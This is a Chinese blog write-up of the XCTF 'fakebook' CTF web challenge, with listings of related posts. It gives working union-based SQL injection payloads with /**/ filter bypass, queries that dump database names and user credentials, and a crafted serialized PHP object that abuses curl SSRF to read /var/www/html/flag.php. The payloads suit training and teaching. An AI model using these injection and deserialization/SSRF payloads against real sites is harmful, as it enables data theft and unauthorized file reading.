XCTF-Web-fakebook

于 2023-06-27 11:04:03 发布
阅读量39 收藏
点赞数
分类专栏: CTF-Web 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45723896/article/details/131410722
版权

打开网址

直接使用Acunetix扫描漏洞

 发现view.php存在CSS漏洞和SQL注入漏洞

使用dirmap扫描

在dirmap的路径下执行python dirmap.py -i 61.147.171.105:55611 -lcf

 扫描出来一个robots.txt文件,访问这个文件

 提示在/user.php.bak

保存文件查看 

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

这里存在SSRF,可以进行任意文件读取

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

偏向于使用SQL注入:

使用SQL注入漏洞

注册一个账号测试

 /view.php?no=3 and 1=2 注入测试,存在漏洞。

 利用order by 排序

/view.php?no=3 order by 3

/view.php?no=3 order by 4

/view.php?no=3 order by 5  到这里报错,说明字段数为4

 

利用union联合注入:/view.php?no=3 union select 1,2,3,4 

 没有回显,应该是被过滤了。

发现/**/能够绕过过滤,使用

/view.php?no=3 union/**/select 1,2,3,4

进行注入

执行注入:

/view.php?no=-1 union/**/select/**/1,group_concat(schema_name),3,4/**/from/**/information_schema.schemata

查询数据库名,可以得到fakebook数据库,跟题目信息一致。查看fakebook数据库中的表名。

查看表名,执行注入:

/view.php?no=-1 union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema='fakebook'

 表名是users,查看表中的信息,执行注入

:/view.php?no=-1 union /**/select /**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='users'

表中有username,passwd等敏感信息。查询字段名:

 /view.php?no=-1 union /**/select /**/1,group_concat(no,'~',username,'~',passwd,'~',data),3,4/**/from/**/fakebook.users

可以发现data字段存放的就是序列化字符串,在使用的时候应该就会调用进行data字段进行反序列化操作

根据报错这里也知道了绝对路径是/var/www/html/

看文中的提示/var/www/html/view.php,我们也可以去猜测flag.php有可能在统一文件夹下,如/var/www/html/flag.php

构造反序列化POC

<?php
class UserInfo
{
    public $name = "123";
    public $age = 7;
    public $blog = "file:///var/www/html/flag.php";

}
$res = new UserInfo();
echo serialize($res);

 

执行后的反序列化内容

O:8:"UserInfo":3{s:4:"name";s:3:"123";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

根据之前的注入可知,有回显的是第二位,也就是username字段,data对应应该就是第四个字段为,将反序列化字符串尝试以注入的方式写入:

/view.php?no=-1 union /**/select /**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' 

注入结果:

 成功写入了data字段,查看源代码,点击iframe的这段标签

 看到被加密的flag,使用的base64加密:PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==

 得到flag:flag{c1e552fdf77049fabf65168f22f7aeab}

 

weixin_45723896
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-fakebook
weixin_43821278的博客
03-12 486
XCTF-fakebook----做题萌新的记录思考上第一步:浏览所有环境第三步 敏感目录扫描第二步:找出漏洞所在下查看御剑的扫描结果那怎么利用SSRF呢??总结 萌新的记录 萌新记录一下这个题,个人感觉这个题比较有综合性。 思考 第一次总结一下WEB题思路,本次解题想法来自诸多大佬的博客。 上 第一步:浏览所有环境 浏览整个网站环境,发现有两个连接,login 和join。加上首页index,目前发现三个,然后F12分别查看index源码,没有发现什么线索。 然后有join和login,多半是自己创建账号
攻防世界XCTFfakebook
末初的CSDN博客
03-14 6190
再注册账号时,发现了个post注入 目录扫描一下,存在robots.txt和flag.php 源码: Get()方法并没有对获取过来的url进行任何的过滤所以这里存在SSRF 这里存在一个get注入 从报错中可以看出网站绝对路径/var/www/html 使用updatexml报错注入查询信息 这里concat()注入还是有很多不方便,使用make_set()进行注入 综合...
攻防世界(Web进阶区)——fakebook
垃圾管理员的垃圾站
04-09 6449
这个思路可能并不是靶场原本想要让用户做的,但也无妨吧,怎样不是做呢。象棋高手总结了几十年的经验,也可能会输给新入门的新手。新手经验不足,更不谈什么战术,无心的一步棋,可能会让老者思前顾后,露出弱点。 进入靶场: 除了一个login登陆按钮,还有一个join注册按钮。开始之前,一般习惯性的扫描下目录,看看有什么。如果大家经常刷题,可以自己写一个目录扫描工具,然后自己整理一套刷题的...
XCTF web进阶区wp(二)
0xdawn的博客
03-04 472
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr(...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
[xctf]fakebook 序列化字符串&&sql注入&&登录流程
qq_37301470的博客
11-21 3591
fakebook 随便注册一个账号,先登录 发现有个href 好奇点一下,竟然冒出了个参数id 于是便想到注入 id' 返回页面报错,有戏,是数字型 id=1 order by 4 %23 判断有四个column id=1 union select 1,2,3,4 %23 竟然说我是黑客,看来过滤了 fuzz一下 发现union/**/select 可以 payload:no=-1 union/**/select 1,group_concat(schema_name),3,4 from info
[网鼎杯 2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4576
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
XCTF 进阶 RE re1-100
A_dmin的博客
07-15 1919
XCTF 进阶 RE re1-100 一天一道CTF题目,能多不能少 打开题目,发现是一个elf文件,直接用ida打开(64),找到主函数main 直接进行分析,函数太长就不贴了~ 找到如下代码: 这一堆的代码看上去就是检查一些东西的,比如说checkStringIsNumber()就是检查字符串是不是全部都是数字: 继续往下走,一步一步分析代码: bufParentRead这个应该就是我们...
网鼎杯 Fakebook
小飒的博客
09-08 185
原题xctf链接:网鼎杯2018[fakebook] 自己没做出来,看了大佬们的wp打算再综合整理下 扫描得知有robots.txt和flag.Php(我的御剑扫不出来robots.txt,不知道为什么(字典里有但扫不到)) Robots.txt里看到user.php.bak 下载保存后获得user.php的源码 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = "";
攻防世界XCTF:wtf.sh-150
末初的CSDN博客
03-09 1057
论坛站,先随便打开一个网站,发现url栏变化如下: 看到这种get一个变量接收传参的很容易让人想到,文件包含或者路径穿越,先试试路径穿越 出现了源码泄露,把这些代码复制下来,稍作整理 从这些源码种应该可以分析出这个admin账户应该是可以使用cookie登录的 接着找找看有没有什么有用的信息,在这些源码种搜索敏感一些字符看看 出现过许多关于users这个目录的信息,我们使用目录穿越…/...
buuctf [网鼎杯 2018]Fakebook 记录
SopRomeo的博客
02-25 3573
首先注册一个账号进去,再查看账户信息,注意url http://2924ddd2-5831-448c-9833-d0aaba7a1fbe.node3.buuoj.cn/view.php?no=1 可能存在sql注入,利用常规的探测,发现他是整形注入,一般的注入行不通,双写绕过不行,试试报错注入, playload:1 and extractvalue(1,concat('~',(select(g...
攻防世界XCTF fakebook
zgwz123456的博客
12-09 221
打开后我们发现login 和 join ,我们先join 其实,这里是有个post注入的 查注入的方法 首先我们打开bp抓包工具 右键选择复制到文件 我们发现这里的username可以进行post注入,后面就可以无脑注入了。 第二种方法 点击我们的admin 下载源码查看 Get()方法并没有对获取过来的url进行任何的过滤所以这里存在SSRF 这里我们对no传参发现有注入漏洞 从报错信息中我们可以得到网站的绝对路径,由于这里不存在回显,那我们便使用updatexml函数进行报错注入 .
XCTF 进阶 RE dmd-50、Shuffle、re2-cpp-is-awesome
A_dmin的博客
07-04 793
XCTF 进阶 RE dmd-50、Shuffle、re2-cpp-is-awesome 一天一道CTF题目,能多不能少 复习有什么意思吗?还不如做两个题快乐 dmd-50 下载文件,直接IDA打开(64) 找到主函数,发现一串奇怪的值: 得到:780438d5b6e29db0898bc4f0225935c0 类似于MD5 经过MD5解码得到:b781cbb29054db12f88f08c6e1...
2020.4.8 xctf(fakebook)
DSR446的博客
04-10 646
提示让我们注册一个账号,这里随便注册,注意一下blog的格式就行。 然后用我们注册好的账号进行登录。 登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ,第一时间想到是否存在sql注入,我们输入 ’ 根据报错的显示,可以肯定存在sql注入的,然后我们用 order by 语句判断查询的字段数目,以便于后续进行 union 查询, 先 ...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值